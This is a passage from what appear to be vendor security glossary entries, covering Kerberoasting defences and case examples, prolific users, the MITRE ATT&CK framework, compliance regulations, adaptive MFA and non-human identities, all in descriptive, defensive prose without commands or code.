threat posed by Kerberoasting. Factors Contributing to Kerberoasting's Success Weak Password Policies: Service accounts often have weak or default passwords that are rarely changed, making them prime targets for Kerberoasting. Lack of Visibility and Monitoring: Many organizations lack the necessary visibility into their AD environment to detect the early signs of a Kerberoasting attack. Misconfiguration and Overprivileged Accounts: Improperly configured service accounts and those with unnecessary privileges expand the attack surface for Kerberoasting. Stealthiness: Kerberoasting attacks are difficult to detect because they don't require elevated privileges and can be performed without triggering multiple failed authentication attempts, which are commonly monitored for. Examples of Kerberoasting Attacks Kerberoasting attacks have been a part of some of the most sophisticated cyber attacks observed in recent years, demonstrating the high stakes involved when organizations fail to secure their Active Directory (AD) environments adequately. Operation Wocao In one notable example, the threat actors behind Operation Wocao utilized the PowerSploit framework's Invoke-Kerberoast module to perform Kerberoasting attacks. This operation showcased the attackers' ability to request encrypted service tickets and subsequently crack the passwords of Windows service accounts offline. The breached accounts were then used for lateral movement within networks, enabling further exploitation and access to sensitive information. This incident underlines the effectiveness of Kerberoasting in advanced persistent threat (APT) campaigns, highlighting the importance of securing service accounts against such attacks (MITRE ATT&CK) . SolarWinds Compromise Another significant case involved the SolarWinds breach, where attackers leveraged Kerberoasting among other techniques to gain access to networks. In this instance, attackers obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names (SPNs) and cracked them offline to escalate their access privileges. This compromise not only highlighted the vulnerability of service accounts to Kerberoasting but also the potential for wide-reaching implications, as the breach impacted numerous high-profile organizations and government agencies (MITRE ATT&CK) . Wizard Spider's Use of Kerberoasting The criminal group known as Wizard Spider has been reported to use Kerberoasting as part of their arsenal. They employed tools like Rubeus and Mimikatz to steal AES hashes and service account credentials through Kerberoasting. This technique allowed them to maintain access and control over compromised networks, facilitating the deployment of ransomware and other malicious payloads. The activities of Wizard Spider exemplify the criminal exploitation of Kerberoasting, underscoring the risk to organizations across sectors (MITRE ATT&CK) . These examples of Kerberoasting attacks illustrate the critical need for organizations to monitor and secure their AD environments actively. The sophistication and diversity of attackers leveraging this technique—from state-sponsored APT groups to criminal collectives—underscore the importance of robust security measures, including strong password policies, regular auditing of service accounts, and the implementation of detection mechanisms to identify suspicious activities indicative of Kerberoasting attempts. Detecting and Preventing Kerberoasting In order to detect and prevent Kerberoasting, which exploits legitimate features of the Kerberos authentication protocol for malicious purposes, a multifaceted approach is required. Organizations can significantly reduce their vulnerability to Kerberoasting through strategic planning, robust security protocols, and continuous monitoring. Best Practices for Prevention Leverage Identity-Based Zero Trust Security policies: By implementing a Zero Trust security model, you can ensure that no entity within the network is trusted by default, regardless of its location within the perimeter. This principle applies to both human users and service accounts, and by requiring verification at every access attempt, you can reduce the attack surface available to adversaries, including those attempting Kerberoasting. Implement Strong Password Policies: Enforce complex, lengthy (ideally 25+ characters), and regularly changed passwords for all accounts, especially service accounts with Service Principal Names (SPNs). Utilizing tools like password managers and Group Managed Service Accounts (gMSAs) can help maintain strong password hygiene without sacrificing operational efficiency . Enable Multi-Factor Authentication (MFA): Adding an extra layer of security through MFA can significantly reduce the risk of unauthorized access, even if service account credentials are compromised. MFA should be standard for all user accounts, not just those with elevated privileges . Adhere to the Principle of Least Privilege (PoLP): Ensure that accounts, especially service accounts, have only the permissions necessary for their functions. Limiting access rights minimizes the potential damage an attacker can do if they compromise an account . Develop a Comprehensive Identity Security Strategy: A robust identity and access management framework can safeguard against various threats, including Kerberoasting. This strategy should include regular audits of service accounts, privileged access management (PAM), and the adoption of security solutions that provide visibility into and control over account use . Techniques for Detecting Kerberoasting Monitor for Anomalous Kerberos Activity: Implement logging and monitoring to detect unusual patterns of Kerberos authentication requests, such as a high volume of TGS requests for SPNs within a short time frame. Audit Service Account Usage: Regularly review service account activity for signs of unauthorized use, such as accessing services or data outside of normal patterns. This review can help identify compromised accounts before they are used for lateral movement or data exfiltration. Leverage Advanced Security Analytics: Utilizing machine learning and behavior analysis can help identify subtle signs of Kerberoasting, distinguishing between legitimate service account use and potentially malicious activity. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/prolific-user/ A user who frequently accesses multiple systems or performs numerous actions, often generating high volumes of identity activity that may require monitoring for anomalies. Prolific users are standard user accounts, as defined by all AD parameters, that have access privileges to an exceedingly high number of machines. Prolific users are not subject to the same monitoring and protection measures placed over admin users. Technically, they are not even admins, since they are not included in any administrative user group. This makes them a highly attractive target for compromise, as they yield a similar result as the compromise of an admin account and are less likely to be protected. Once compromised, attackers gain a direct route into the same resources as these prolific user accounts, facilitating a rapid and efficient lateral movement process. There is no straightforward way to know in advance if a user account is prolific or not. However, given their relatively large number, attackers stand a good chance of finding one simply by trying to use a standard compromised account to move laterally. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/mitre-attack-framework/ A globally recognized knowledge base of adversarial tactics, techniques, and procedures used to simulate, understand, and defend against cybersecurity threats. The MITRE ATT&CK Framework has emerged as a model for cybersecurity and IT professionals, offering a comprehensive matrix that categorizes and describes specific tactics, techniques, and procedures (TTPs) used by threat actors in their cyber operations. This framework was created to provide a granular understanding of adversary behaviors and enable organizations to better understand the adversary’s actions and prepare more effective defenses against them. The significance of the MITRE ATT&CK Framework in cybersecurity cannot be overstated. For IT professionals, it serves as a valuable reference that aids in the identification, prevention, and mitigation of cyber threats. By offering a detailed understanding of how adversaries operate, the framework empowers defenders to adopt a more proactive stance in their cybersecurity measures. This, in turn, enhances their ability to protect critical infrastructure and sensitive data against increasingly sophisticated attacks. The MITRE ATT&CK Matrix: Understanding the Framework's Structure At the core of the MITRE ATT&CK Framework is its detailed matrix of tactics, techniques, and procedures (TTPs), a structured categorization that provides a granular understanding of adversary behaviors. This section will explain the framework's structure, offering insights into how its components interlink to offer a comprehensive picture of cyber threats. Tactics Tactics represent the "why" of an adversary's actions—their objectives during an attack. Each tactic within the framework corresponds to a specific goal that the adversary aims to achieve, such as gaining initial access, executing commands, or exfiltrating data. Understanding these tactics allows cybersecurity professionals to anticipate what an attacker might do next, informing strategic defensive measures. The MITRE ATT&CK Framework organizes these objectives into a series of categories, each representing a stage in the attack lifecycle. From initial access and execution to privilege escalation and exfiltration, tactics offer a lens through which to view the adversary's intentions. Recognizing these objectives is pivotal for defenders, as it guides the development of targeted defensive strategies to thwart the attackers' plans. Reconnaissance: The collection of information used to plan future attacks. This includes gathering data on the target's personnel, infrastructure, and digital presence to identify vulnerabilities and plan entry points. Resource Development: The creation and management of resources used in attacks, such as acquiring domain names, developing malware, and establishing infrastructure for operations. Initial Access: The methods attackers use to gain an entry point into a network. Techniques under this tactic include phishing, exploiting public-facing applications, and using valid accounts. Execution: The execution of code to carry out actions on the target system, such as running malicious scripts or exploiting vulnerabilities to execute arbitrary code. Persistence: The techniques used by attackers to maintain their foothold within a network across reboots, changed credentials, and other interruptions that could cut off their access. Privilege Escalation: Methods used to gain higher-level permissions on a system or network. Common techniques include exploiting system vulnerabilities and manipulating access tokens. Defense Evasion: Techniques designed to avoid detection by security measures, such as obfuscating malicious code, disabling security software, and using encryption to hide command and control traffic. Credential Access: The strategies used to steal account names and passwords, including credential dumping, input capture, and exploiting system or service vulnerabilities. Discovery: The actions taken to gain knowledge about the system and internal network. Attackers may catalog software installations, understand security policies, and enumerate system and network resources. Lateral Movement: Techniques that enable an attacker to move through a network, gaining access to additional systems to control remote systems, often using stolen credentials. Collection: The gathering of data of interest to the attacker's objectives. This may involve capturing screenshots, keylogging, or collecting data stored in the cloud. Command and Control (C2): The mechanisms used to maintain communication with the compromised system, allowing the attacker to control the system remotely, exfiltrate data, and deploy additional tools. Exfiltration: The methods used to steal data from the target network. Techniques can include transferring data over the command and control channel, using a web service, or physical means. Impact: The tactics aimed at disrupting, destroying, or manipulating information and systems to affect the target's operations. This includes data destruction, defacement, and denial of service attacks. Techniques Techniques describe "how" the adversaries achieve their objectives. For each tactic, the framework lists various techniques that adversaries might employ. For instance, under the tactic of "Initial Access," techniques could include spear-phishing emails or exploiting public-facing applications. By cataloging these techniques, the framework offers a playbook of potential attack methods, enabling defenders to tailor their defenses to the most likely threats. For each tactic, there are multiple techniques that an adversary might employ, reflecting the diverse array of tools and methods at their disposal. Understanding these techniques is critical for cybersecurity professionals, as it enables them to identify potential attack vectors and implement appropriate safeguards. The MITRE ATT&CK Framework catalogs a vast array of techniques that adversaries use to achieve their objectives throughout the attack lifecycle. While the relevance of specific techniques can vary depending on the context, environment, and targets, there are several that are frequently observed across a wide range of incidents. Below, we outline some of the most common techniques detailed in the framework, emphasizing their widespread application and the critical need for defenses against them. Phishing (T1566): Utilizing fraudulent communications, often email, to deceive users into providing sensitive information or executing malicious payloads. Drive-by Compromise (T1189): Exploiting vulnerabilities in web browsers to execute code simply by visiting a compromised website. Command and Scripting Interpreter (T1059): Employing scripts or commands to execute actions. PowerShell (T1059. 001) is particularly prevalent due to its powerful capabilities and deep integration with Windows environments. User Execution (T1204): Tricking users into running malicious code, for example, by opening a malicious attachment or link. Registry Run Keys / Startup Folder (T1547. 001): Adding programs to registry keys or startup folders to execute malware automatically upon system startup. Account Manipulation (T1098): Modifying user accounts to maintain access, such as adding credentials to a domain account. Exploitation for Privilege Escalation (T1068): Taking advantage of software vulnerabilities to gain higher-level privileges. Valid Accounts (T1078): Using legitimate credentials to gain access, often leading to elevated privileges if the credentials belong to a user with more access. Obfuscated Files or Information (T1027): Concealing malicious code within files to evade detection. Disabling Security Tools (T1562): Actions taken to disable security software or services that could detect or prevent malicious activity. Credential Dumping (T1003): Extracting credentials from systems, often through tools like Mimikatz. Input Capture (T1056): Recording user input, including keylogging, to capture credentials and other sensitive information. System Information Discovery (T1082): Gathering information about the system to inform further actions, such as software versions and configurations. Account Discovery (T1087): Identifying accounts, often to understand privileges and roles within the environment. Remote Services (T1021): Using remote services such as Remote Desktop Protocol (RDP), Secure Shell (SSH), or others to move across systems. Pass the Ticket (T1097): Using stolen Kerberos tickets to authenticate as other users without the need for their plaintext password. Commonly Used Port (T1043): Utilizing ports that are typically open for internet traffic to communicate with controlled systems, helping to blend in with legitimate traffic. Standard Application Layer Protocol (T1071): Using protocols such as HTTP, HTTPS, or DNS to facilitate command and control communications, making detection more challenging. Data Encrypted for Impact (T1486): Encrypting data to prevent its use and potentially leveraging it for ransom demands. Exfiltration Over Command and Control Channel (T1041): Sending stolen data over the same channel used for command and control to avoid additional network footprints. These techniques represent just a sample of the extensive options adversaries have at their disposal. Effective cybersecurity practices require ongoing education and adaptation to address these and emerging techniques. By understanding and preparing for these common techniques, organizations can enhance their defensive posture and reduce the risk of successful cyber attacks. Procedures Procedures are the specific implementations of techniques by actual threat actors. They represent the real-world application of techniques, providing examples of how a specific adversary group might leverage a technique to achieve their objectives. This level of detail adds depth to the framework, illustrating the practical use of techniques in various contexts. They represent the actual execution of techniques in real-world scenarios, offering granular examples of how adversaries apply these methods to achieve their goals. Organizations can gain insight into the mode of operation of particular threat actors by studying procedures, enabling them to tailor their defenses accordingly. The framework is further organized into matrices for different platforms, acknowledging the distinct nature of cyber threats across environments like Windows, macOS, Cloud, and others. This differentiation ensures that the framework's insights are relevant and actionable across a broad spectrum of IT infrastructures. Application in Real-World Scenarios The practical application of the MITRE ATT&CK Framework in real-world scenarios underscores its value to cybersecurity and IT professionals. By providing a detailed understanding of adversary behaviors, the framework facilitates a proactive approach to security, enhancing an organization's capacity to anticipate, detect, and respond to cyber threats. Enhancing Threat Intelligence Comprehensive Adversary Profiles: By aggregating and analyzing techniques associated with specific threat actors, the framework helps organizations develop detailed adversary profiles, offering insights into potential future attacks. Trend Analysis: The framework aids in identifying emerging trends in cyber threats, enabling security teams to adjust their defenses in anticipation of evolving tactics and techniques. Strengthening Security Operations Security Posture Assessment: Organizations use the MITRE ATT&CK Framework to assess their security posture, identifying potential vulnerabilities in their defenses and prioritizing remediation efforts based on the techniques most relevant to their threat landscape. Threat Hunting: Security professionals leverage the framework to guide their threat hunting activities, using known tactics and techniques as indicators of compromise to uncover latent threats within their environments. Informing Incident Response Accelerating Detection and Response: Incident response teams apply the framework to rapidly identify the tactics and techniques employed in an attack, facilitating a quicker and more targeted response to breaches. Post-Incident Analysis: Following an incident, the framework is used to dissect the attack chain, providing valuable lessons that can be used to fortify defenses against future attacks. History of the MITRE ATTACK Framework The genesis of the MITRE ATT&CK Framework traces back to 2013, marking the culmination of efforts by MITRE, a not-for-profit organization renowned for its dedication to solving critical public challenges through research and innovation. Originating as a project within MITRE to document the behavior of advanced persistent threats (APTs), the framework has since transcended its initial scope, evolving into a globally recognized encyclopedia of adversary tactics and techniques. The Early Days The inception of ATT&CK was driven by the need for a standardized language and methodology to describe and categorize the behavior of cyber adversaries. Prior to ATT&CK, the cybersecurity community lacked a unified framework for sharing information about how threats operated, making it challenging to build collective defenses against common adversaries. Recognizing this gap, MITRE set out to create a tool that would not only facilitate better understanding of threat behaviors but also foster collaboration within the cybersecurity community. Expansion and Evolution What started as a modest collection of techniques observed in APT campaigns rapidly expanded as contributions from cybersecurity professionals around the world began to enrich the framework. This collaborative effort led to the diversification of the framework, extending its applicability beyond APTs to encompass a wide range of cyber threats across various environments, including cloud, mobile, and network-based systems. Key Milestones 2013: Launch of the ATT&CK Framework, initially focusing on Windows-based threats. 2015: Introduction of matrices for other platforms, such as macOS and Linux, reflecting the framework's growing inclusivity. 2017: Expansion to cover mobile threats, highlighting the evolving landscape of cybersecurity concerns. 2018: Release of the ATT&CK for Enterprise matrix, offering insights into adversary tactics and techniques across all major platforms. 2020 and Beyond: Continuous updates and the introduction of sub-techniques to provide even more granular insights into adversary behaviors. The development of ATT&CK has been marked by an ongoing commitment to openness and community engagement. By soliciting feedback and contributions from cybersecurity practitioners worldwide, MITRE has ensured that the framework remains relevant, up-to-date, and reflective... --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/cyber-security-compliance/ Adherence to laws, regulations, and standards (e.g., HIPAA, GDPR, PCI DSS, SOX) governing how sensitive data must be handled and protected. Cyber security compliance refers to following the set of rules and regulations regarding how organizations should handle and protect sensitive data. Compliance is important for any company that collects, processes or stores personally identifiable information (PII), protected health information (PHI), financial data or other sensitive information. Some of the major regulations that organizations must comply with include: The Health Insurance Portability and Accountability Act (HIPAA) which protects PHI. Healthcare organizations and their business associates must comply with HIPAA. The General Data Protection Regulation (GDPR) which protects PII of individuals in the European Union. Any company that markets to or collects data from people in the EU must comply with GDPR. Payment Card Industry Data Security Standard (PCI DSS) which applies to any organization that accepts credit card payments. They must comply to ensure customer payment data is protected. The Sarbanes-Oxley Act (SOX) which applies to publicly traded companies in the U. S. SOX compliance ensures accurate financial reporting and internal controls. Complying with these and other cyber security standards is important to avoid potential legal issues and penalties. Non-compliance can lead to hefty fines and damage to an organization's reputation. To achieve compliance, organizations must implement technical controls like data encryption, access management, and network security. They must also have appropriate policies and procedures in place, conduct risk assessments, and train employees on security best practices. Compliance frameworks like the NIST Cybersecurity Framework can help guide organizations in building a robust cyber security compliance program. Major Compliance Frameworks and Standards There are several major regulatory requirements for cyber security compliance that that organizations need to understand: Payment Card Industry Data Security Standard (PCI DSS) The PCI DSS applies to any organization that processes, stores or transmits credit card payments. It consists of 12 requirements related to building and maintaining a secure payment card data environment. Organizations must validate PCI DSS compliance annually through an assessment. Health Insurance Portability and Accountability Act (HIPAA) HIPAA establishes requirements for protecting sensitive patient health information. It applies to health plans, health care clearinghouses, and health care providers. HIPAA requires administrative, physical and technical safeguards to ensure the confidentiality, integrity and availability of electronic protected health information (ePHI). General Data Protection Regulation (GDPR) GDPR is a European Union regulation that protects the personal data of EU citizens. It applies to organizations that collect or process personal data of individuals in the EU, regardless of whether the organization is based in the EU. GDPR requires transparency, consent, data minimization, accuracy, storage limitation, integrity, confidentiality and accountability. Sarbanes-Oxley Act (SOX) SOX establishes requirements for financial reporting accuracy and reliability for publicly traded companies in the US. Section 404 requires management to annually assess and report on the effectiveness of internal controls over financial reporting. SOX compliance aims to prevent accounting fraud and protect shareholders. Other Frameworks Additional cyber security standards include: NY-DFS Part 500: A regulation from the New York State Department of Financial Services (NYDFS) that sets cybersecurity requirements for financial institutions and services companies in New York. Implemented in March 2017, it aims to protect customer information and IT systems from cyber threats by mandating covered entities to assess their cybersecurity risk and implement a plan to mitigate these risks. PCI-DSS 4. 0: The Payment Card Industry Data Security Standard version 4. 0 is the latest update to security standards for organizations handling branded credit cards. It focuses on protecting cardholder data and ensuring secure payment environments, emphasizing continuous monitoring and adapting to new threats. NIS2 Directive: A proposed EU regulation to replace the existing NIS Directive, aiming to increase security requirements for digital services, expand critical sectors, and enforce stricter supervisory measures and information sharing among EU member states. Digital Operational Resilience Act: Part of the EU's strategy to strengthen cybersecurity in the financial sector, ensuring that all participants have safeguards in place to mitigate cyberattacks and other risks. MAS Cybersecurity: The Monetary Authority of Singapore's cybersecurity framework outlines guidelines for financial institutions in Singapore, emphasizing robust security measures, risk assessments, and cybersecurity governance. Essential Eight: Cybersecurity strategies recommended by the Australian Cyber Security Centre, providing baseline cyber defense strategies for organizations. It includes strategies such as application control, patch applications, and multi-factor authentication. UK Telecommunications Security Framework: Sets enhanced security requirements for UK telecommunications providers to strengthen the security and resilience of public telecommunication networks and services against disruptions and cyber threats. Cybersecurity Code of Practice for Critical Information Infrastructure 2. 0: Designed to protect critical information infrastructure in various sectors, outlining best practices and standards for securing digital assets against cyber threats. UK Cyber Essentials and Cyber Essentials Plus: UK government-backed schemes to help organizations protect against common cyber attacks. Cyber Essentials focuses on basic cyber hygiene controls, while Cyber Essentials Plus involves higher assurance through independent testing of cyber security measures. Staying up-to-date with compliance standards relevant to an organization's industry and geography is crucial for cyber security professionals to understand. Compliance violations can lead to legal penalties, financial loss, and damage to an organization's reputation. Proactively building a compliance program and validating compliance through audits and assessments is key to mitigating these risks. Responsibilities in Cyber Security Compliance Compliance helps reduce risk, enforce security standards, and ensure the confidentiality, integrity, and availability of data and IT systems. The key responsibilities in cyber security compliance include: Conducting risk assessments to identify vulnerabilities, threats, and their potential impacts. Risk assessments examine an organization’s sensitive data, critical systems, and security controls to determine the likelihood and severity of cyber threats. The results are used to prioritize risks and implement appropriate safeguards. Developing and enforcing security policies, standards, procedures, and controls. These cyber security frameworks establish rules around data protection, access management, security monitoring, incident response, and other areas. They must align with legal, regulatory, and contractual obligations. Continuously reviewing and updating policies and procedures is necessary to account for changes in technology, regulations, business operations, and the threat landscape. Monitoring networks, systems, and user activity for security events and compliance violations. Continuous monitoring helps quickly detect compromises, data breaches, unauthorized access, malware infections, and other issues. It requires using log analysis tools, security information and event management (SIEM) solutions, data loss prevention (DLP) systems, and other technologies to collect, analyze, and alert on security data. Responding to security incidents like data breaches, ransomware infections, insider threats, and advanced persistent threats (APTs) to minimize damage and restore normal operations. Incident response plans detail the steps for detecting, containing, eradicating, and recovering from cyber attacks. They specify roles and responsibilities, communication protocols, and procedures for forensic analysis, damage assessment, and remediation. Providing regular cyber security awareness and training for employees. Educating end users about security policies, safe computing practices, and the latest cyber threats is essential for compliance. Security awareness programs aim to change risky behaviors and make individuals vigilant and responsible in protecting the organization's data and systems. Conducting audits to evaluate compliance with cyber security standards and identify areas for improvement. Both internal and external audits are performed to examine security controls, review policies and procedures, check for vulnerabilities, and ensure legal and regulatory compliance. The audits result in reports with recommendations to remediate any gaps and strengthen the overall security posture. Steps for Achieving Compliance Achieving cybersecurity compliance requires planning and diligence. Organizations should take a systematic approach to establishing and maintaining a compliance program. The following steps provide an overview of how to achieve compliance: Develop a compliance policy The first step is to establish an official policy that outlines the organization’s commitment to cybersecurity compliance. This policy should define the scope of compliance activities, assign responsibilities, and gain executive approval. With leadership buy-in established, organizations can move on to assessing their compliance obligations. Identify applicable regulations Organizations must determine which industry regulations apply to their operations. Common regulations include HIPAA for healthcare, GDPR for data privacy, and PCI DSS for payment security. Organizations should regularly review new and updated regulations to ensure ongoing compliance. Conduct a risk assessment A risk assessment identifies cyber risks and vulnerabilities that could impact compliance. It provides the foundation for a compliance program by revealing where controls need to be implemented. Risk assessments should be performed periodically to account for changes in technology infrastructure and compliance requirements. Implement controls and procedures With risks identified, organizations can deploy appropriate controls and update procedures to safeguard systems and data, meeting key compliance mandates. Standard controls include access management, encryption, monitoring, and security awareness training. Procedures should be thoroughly documented, with records maintained to demonstrate compliance. Monitor and audit compliance Regular monitoring and auditing are required to maintain continuous compliance. Monitoring tools can track controls, detect violations, and generate reports. Both internal and external audits should be conducted, with results analyzed to identify and remediate gaps. Compliance is an ongoing process that requires continuous improvement. Train employees People play a key role in compliance, so ongoing security awareness and compliance training for all employees is critical. Training should be required, with completion tracked to ensure all personnel understand their responsibilities. Compliance fundamentals and any recent changes to regulations or controls should be covered. Conclusion Ensuring compliance with cyber security standards and regulations is a crucial responsibility for organizations today. As cyber threats become increasingly sophisticated, governments and industry groups have established guidelines to help protect sensitive data and critical infrastructure. Compliance may require ongoing assessments, audits, training, and adaptation to new laws and standards. While compliance does not necessarily equate to security, following regulatory guidance and frameworks helps establish a robust security posture, builds trust with customers and partners, and avoids potential legal consequences of non-compliance. --- - Published: 2024-05-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/adaptive-multi-factor-authentication/ A risk-based authentication system that evaluates login context using AI and machine learning, prompting for extra factors only when a request is deemed high‑risk. Adaptive multi-factor authentication (MFA) is an authentication method that uses a risk-based approach to apply additional authentication factors based on contextual data. Unlike traditional MFA, adaptive MFA evaluates each login attempt to determine the level of risk before requiring additional authentication factors. Adaptive MFA solutions leverage machine learning algorithms and artificial intelligence to analyze numerous data points like user behavior, location, time of day, device type, and more. If the login appears risky based on the analyzed data, the user will be prompted for an additional authentication factor like a security code sent via SMS text message or a push notification to an authentication app. For logins that appear less risky, the user may not be prompted for an additional factor. The goal of adaptive MFA is to improve the user experience by reducing authentication friction for low-risk logins while still providing strong security for high-risk logins. This data-driven approach to authentication helps, based on a "risk score", prevent unauthorized access by requiring additional authentication only when truly needed based on the context of the login request. Adaptive MFA allows organizations to implement MFA in a way that balances security and usability. By leveraging adaptive MFA, organizations can implement strong authentication for all user logins without negatively impacting the user experience. Adaptive MFA solutions provide robust protection against account takeover attacks while delivering a seamless login experience for legitimate users. How Adaptive MFA Works Adaptive Multi-Factor Authentication (MFA) is an advanced approach to MFA that uses context-based access control. It goes beyond just verifying a user's identity by also analyzing additional factors about the login attempt. Adaptive MFA evaluates multiple factors, including: Geo-location: The physical location of the login attempt is analyzed to determine normal access patterns and detect anomalies. For example, if a user usually logs in from New York but there is suddenly a login from Russia, it may be flagged as suspicious. Device profiling: The device type, operating system, browser, and other attributes are checked to build a profile of the devices a user normally uses to access the application. Unrecognized devices are viewed as higher risk. Behavioral profiling: The user's typical behavior, typing speed, mouse movements, and other patterns are learned by the system over time. Deviations from the established baseline behavior can indicate account takeover. Business rules: Organization-specific business rules and policies are incorporated into the risk analysis. For example, restricting access to sensitive data based on job function or time of day. By combining multiple factors, Adaptive MFA is able to make smarter authentication decisions based on the overall risk assessment. This may result in step-up authentication for suspicious logins, while low-risk logins proceed without additional verification. The end result is reduced friction for users and enhanced security for the organization. The Benefits of Using Adaptive MFA Adaptive Multi-Factor Authentication (MFA) provides several key benefits for organizations. Improved security and reduced risk of information breaches Adaptive MFA helps prevent unauthorized access by requiring multiple methods to verify users' identities, such as passwords, security keys, and biometrics. By combining multiple factors, the solution creates an additional layer of security that is more difficult for cybercriminals to breach. This multi-layered approach significantly reduces the risks of data breaches, account takeovers, and other cyber threats. Enhanced user experience and seamless access for legitimate users Adaptive MFA solutions use machine learning and risk-based algorithms to analyze user login details and behaviors to determine normal or suspicious activity. The solution learns users' habits and can prompt for stronger authentication only when anomalies are detected. This risk-based approach helps provide a balance of security and convenience for users by reducing the frequency of step-up authentication for legitimate users with normal login patterns. Users can enjoy fast, seamless access the majority of the time. Support for Single Sign-On (SSO) and workplace flexibility Adaptive MFA solutions typically integrate with common SSO and Identity and Access Management (IAM) solutions, allowing users to access multiple applications and systems with one set of login credentials. Adaptive MFA also supports today's flexible work environments by enabling secure authentication from any location. Users can authenticate using methods like push notifications to their mobile devices, SMS codes, security keys, and biometrics. Are Adaptive MFA and Risk-Based Authentication the same thing? Adaptive Multi-Factor Authentication and Risk-Based Authentication are closely related concepts in the realm of cybersecurity, but they are not exactly the same. While both Adaptive MFA and Risk-Based Authentication involve analyzing risk factors to provide appropriate security measures, Adaptive MFA is more focused on the authentication process itself, adapting the required authentication factors based on the evaluated risk. On the other hand, RBA takes a broader approach, assessing the risk of specific actions or transactions beyond just the login process. Adaptive MFA can be seen as a subset or a specific application of the broader RBA approach. Implementing Adaptive MFA Implementing Adaptive Multi-Factor Authentication (MFA) within an organization requires significant planning and resources to be effective. There are several steps organizations should take: Conduct a risk assessment An organization must first evaluate its security risks and requirements. It should determine what data and systems need enhanced protection and map those to appropriate MFA methods. More sensitive data may require stronger factors like biometrics while less sensitive systems may only need SMS authentication. An assessment will guide an organization in choosing the right MFA types and deployment strategies. Choose MFA types There are various MFA options including SMS codes, security keys, biometrics, push notifications, and OTP apps. An organization should select MFA methods that balance security and user experience. More secure options like biometrics may be better for high-risk systems while push notifications could suffice for low-risk ones. Providing multiple MFA options allows users to choose their preferred method. Develop policies and procedures Organizations need to establish comprehensive policies around MFA including enrollment, usage, and exception handling processes. Procedures should be documented to ensure consistent and effective implementation. Policies should also specify consequences for non-compliance to maximize adoption. Conduct user training Training and education are critical to gaining user acceptance of MFA. Users should understand why MFA is important, how the selected methods work, and any policies that apply. Hands-on demonstrations and practice opportunities will make the transition to MFA smoother. Ongoing communications about MFA best practices will help sustain adoption. Monitor and manage the program MFA programs require continuous monitoring and management. Organizations must track key metrics around usage, security events, and user experience to make improvements. They need to stay up-to-date with advancements in MFA technologies and adjust their programs accordingly. Proactive management of an MFA program will help maximize both security and user satisfaction over the long run. Role-Based Adaptive Authentication and Behavioral Analytics Role-based adaptive authentication implements different authentication requirements depending on a user's position and level of access. Executives and administrators typically have access to sensitive data and systems, so they may require hard tokens or biometrics in addition to passwords for most logins. Regular employees with more limited access may only need single-factor authentication, like a password, for routine logins. However, if a standard employee attempts to access an executive's account or sensitive data, the system can prompt for additional authentication factors. Behavioral analytics monitors user activity and login patterns to detect anomalies that could indicate account compromise or fraud. Things like logging in from an unusual location or device, attempting access during non-working hours, frequent password resets, or other abnormal behaviors may trigger the system to prompt for additional authentication factors to verify the user's identity. The specific factors required may also depend on the user's role. Over time, the system learns a user's normal activity patterns and can fine-tune when and what types of multi-factor authentication to apply. Adaptive MFA and behavioral analytics work together to apply the appropriate level of authentication based on each user's normal activity and access levels. By using role-based factors and learning over time, the system can improve security where it's needed most while maintaining usability and productivity. The result is a flexible, intelligent access management solution. Conclusion By requiring multiple methods to verify a user's identity and dynamically adjusting the factors based on risk, adaptive MFA solutions can help close security gaps and reduce fraud. While not a silver bullet, adaptive MFA makes unauthorized account access significantly more difficult and time-consuming for attackers. For cybersecurity and IT professionals looking to balance security and user experience, adaptive MFA may be an approach worth exploring. With data breaches on the rise, using multiple factors that change based on context is an effective strategy to verify identity and help safeguard access. --- - Published: 2024-05-16 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/non-human-identity/ Digital identities assigned to systems, bots, or services rather than people—like service accounts or automated agents—that require management and protection just like human identities. Non-human identities (NHIs) are digital entities used to represent machines, applications, and automated processes within an IT infrastructure. Unlike human identities, tied to individual users, NHIs facilitate machine-to-machine interactions and perform repetitive tasks without human intervention. These machine identities are critical in both cloud-native and on-premises environments, where they help manage and automate complex workflows. Examples of NHIs include API keys, OAuth tokens, service accounts, and system accounts. Each type of NHI serves a different purpose. API keys allow different software applications to communicate securely, while OAuth tokens enable authentication and authorization processes in web services. Service accounts are dedicated accounts in Active Directory used by applications to interact with other systems, performing tasks such as data backups and system monitoring.   NHIs play a pivotal role in ensuring seamless operations in digital environments. They enable continuous integration and delivery (CI/CD) pipelines, manage cloud services, and integrate disparate applications, thereby enhancing operational efficiency and automation. As a result of their widespread use, they pose significant security challenges, necessitating robust management and protection measures to prevent unauthorized access. Human vs. Non-Human Identities The primary distinction between human and non-human identities lies in their nature and the security protocols governing them. Human identities are associated with individual users who interact with systems and applications, typically requiring multi factor authentication (MFA) and regular password changes. Non-human identities (NHIs), on the other hand, represent applications, services, and automated processes, often operating without direct human oversight. Key Differences in Security Protocols and Oversight Human identities are managed and protected with well-defined security practices, including strong authentication methods, role-based access controls, and regular monitoring of user activities. These identities are often subject to extensive monitoring to ensure compliance with security policies and regulatory requirements. Conversely, NHIs are created to perform specific tasks and functions, such as automated backups or API communications, and are not directly monitored by individuals. As a result, they may not be subject to the same level of scrutiny, making them potential targets for exploitation. Challenges in Managing and Securing NHIs vs Human Identities Managing and securing NHIs presents unique challenges. Unlike human users, NHIs do not have the ability to respond to MFA prompts or change passwords regularly. This can lead to practices where passwords or tokens are hardcoded into scripts or applications, making them difficult to rotate or update. Additionally, NHIs often have elevated privileges to perform their tasks, increasing the risk if their credentials are compromised. Another significant challenge is the sheer volume and variety of NHIs within an organization. With the rise of cloud computing, microservices, and automated workflows, the number of NHIs has grown exponentially. This proliferation makes it difficult for security teams to maintain visibility and control over all NHIs, especially those created without proper documentation or oversight. AspectHuman IdentitiesNon-Human IdentitiesAuthentication and Access ControlTypically involves MFA, enhancing security through multi-layered approaches. Cannot use traditional MFA. Authentication relies on static credentials like API keys or service account passwords. Visibility and MonitoringUser activities are regularly monitored through behavior analytics and SIEM systems. NHIs are harder to monitor due to continuous operation and high volume, leading to longer periods of unnoticed unauthorized actions. Lifecycle ManagementManaged through IAM solutions, ensuring appropriate access via provisioning, de-provisioning, and access reviews. Often lack comprehensive lifecycle management, leading to stale or overly permissive credentials. Privilege ManagementRBAC and least privilege principles ensure minimal necessary permissions. Frequently have elevated privileges, making them 